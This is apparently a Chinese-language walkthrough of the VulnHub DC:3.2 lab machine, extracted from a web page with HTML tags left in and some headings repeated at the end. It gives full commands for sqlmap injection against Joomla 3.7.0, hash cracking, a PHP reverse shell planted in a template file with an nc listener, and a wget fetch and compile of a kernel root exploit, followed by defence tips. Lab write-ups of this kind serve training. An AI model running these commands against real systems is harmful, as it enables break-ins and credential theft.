DC:3.2 靶机渗透测试教学文档<\/h1>

一、环境准备<\/h2>

靶机信息<\/h3>

名称: DC:3.2<\/li>
下载地址: https:\/\/www.vulnhub.com\/entry\/dc-32,312\/<\/li>

默认IP: 192.168.44.135 (可能需根据实际网络环境调整)<\/li> <\/ul>

攻击机配置<\/h3>

推荐IP: 192.168.44.133<\/li>

所需工具:

Python<\/li> <\/ul> <\/li> <\/ul>

二、信息收集阶段<\/h2>

1. 主机发现<\/h3>

nmap -sn 192.168.44.0\/24
<\/span><\/span># 或<\/span>
<\/span><\/span>arp-scan -I eth0 -l
<\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3>
nmap -sV -p- 192.168.44.135
<\/span><\/span><\/code><\/pre>发现结果<\/strong>:<\/p>

开放端口: 80 (Apache\/2.4.18)<\/li>
内核版本范围: 3.2-4.9<\/li>
<\/ul>
3. Web目录扫描<\/h3>
使用工具如dirb、gobuster或dirsearch:<\/p>
gobuster dir -u http:\/\/192.168.44.135 -w \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>重要发现<\/strong>:<\/p>

\/administrator\/index.php<\/code>: Joomla后台登录页面<\/li>
\/readme.txt<\/code>: 显示Joomla版本为3.7.0<\/li>
<\/ul>
三、漏洞利用阶段<\/h2>
1. Joomla 3.7.0 SQL注入漏洞利用<\/h3>
漏洞参考<\/strong>:

安全客-Joomla!3.7.0 SQL注入漏洞分析<\/a><\/p>
使用sqlmap进行利用<\/strong>:<\/p>
sqlmap -u "http:\/\/192.168.44.135\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --technique=<\/span>U --dbms=<\/span>mysql --batch --dbs
<\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p>

表名中包含星号(*)时需要转义或引号包裹<\/li>
获取用户表数据:<\/li>
<\/ul>
sqlmap -u "http:\/\/192.168.44.135\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> -D joomladb -T "#__users"<\/span> -C username,password --dump
<\/span><\/span><\/code><\/pre>2. 密码破解<\/h3>
使用John the Ripper破解获取的哈希:<\/p>
john --wordlist=<\/span>\/path\/to\/wordlist.txt hash.txt
<\/span><\/span><\/code><\/pre>破解结果<\/strong>: 密码为"snoopy"<\/p>
3. 后台登录与Webshell上传<\/h3>

访问\/administrator\/index.php<\/code>使用获取的凭据登录<\/li>
导航至: Extensions > Templates > Beez3<\/li>
编辑error.php<\/code>文件，插入PHP反向shell代码

可使用\/usr\/share\/webshells\/php\/php_reverse.php<\/code><\/li>
修改监听IP和端口<\/li>
<\/ul>
<\/li>
<\/ol>
4. 获取反向Shell<\/h3>

在攻击机启动监听:<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
访问包含webshell的页面触发连接<\/li>
<\/ol>
5. 交互式Shell升级<\/h3>
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>四、权限提升阶段<\/h2>
1. 初始提权尝试<\/h3>
sudo -l  # 需要密码<\/span>
<\/span><\/span>uname -a # 查看内核版本<\/span>
<\/span><\/span><\/code><\/pre>2. 内核漏洞利用<\/h3>
发现39772.txt<\/code>文件，内容提示:<\/p>

存在可利用的内核漏洞<\/li>
成功执行可在60秒内获取root权限<\/li>
<\/ul>
利用步骤<\/strong>:<\/p>

在攻击机启动Python HTTP服务:<\/li>
<\/ol>
python2 -m SimpleHTTPServer 8000<\/span>
<\/span><\/span><\/code><\/pre>
在目标机下载利用程序:<\/li>
<\/ol>
cd \/tmp
<\/span><\/span>wget http:\/\/192.168.44.133:8000\/39772.zip
<\/span><\/span><\/code><\/pre>
解压并编译:<\/li>
<\/ol>
unzip 39772.zip
<\/span><\/span>cd 39772<\/span>
<\/span><\/span>tar -xvf exploit.tar
<\/span><\/span>cd ebpf_mapfd_doubleput_exploit
<\/span><\/span>.\/compile.sh
<\/span><\/span>.\/doubleput
<\/span><\/span><\/code><\/pre>3. 获取flag<\/h3>
成功提权后:<\/p>
cat \/root\/flag
<\/span><\/span><\/code><\/pre>五、关键知识点总结<\/h2>


信息收集<\/strong>:<\/p>

主机发现与端口扫描是渗透测试基础<\/li>
Web目录扫描可发现隐藏资源<\/li>
版本信息泄露是常见漏洞来源<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong>:<\/p>

已知CMS版本应立即搜索相关漏洞<\/li>
SQL注入利用需注意特殊字符处理<\/li>
密码破解是常见提权手段<\/li>
<\/ul>
<\/li>

权限提升<\/strong>:<\/p>

内核漏洞是Linux系统常见提权方式<\/li>
利用文件传输技巧克服环境限制<\/li>
编译型漏洞利用需注意目标环境兼容性<\/li>
<\/ul>
<\/li>

后渗透<\/strong>:<\/p>

交互式shell提升操作便利性<\/li>
系统信息收集为后续攻击提供方向<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御建议<\/h2>

及时更新CMS系统和插件<\/li>
使用强密码策略<\/li>
限制后台文件修改权限<\/li>
定期更新操作系统内核<\/li>
实施最小权限原则<\/li>
监控系统日志和异常行为<\/li>
<\/ol>

DC:3.2 靶机渗透测试教学文档<\/h1>

一、环境准备<\/h2>

二、信息收集阶段<\/h2>

三、漏洞利用阶段<\/h2>

四、权限提升阶段<\/h2>

六、防御建议<\/h2> 及时更新CMS系统和插件<\/li> 使用强密码策略<\/li> 限制后台文件修改权限<\/li> 定期更新操作系统内核<\/li> 实施最小权限原则<\/li> 监控系统日志和异常行为<\/li> <\/ol>

六、防御建议<\/h2>

及时更新CMS系统和插件<\/li>
使用强密码策略<\/li>
限制后台文件修改权限<\/li>
定期更新操作系统内核<\/li>
实施最小权限原则<\/li>
监控系统日志和异常行为<\/li> <\/ol>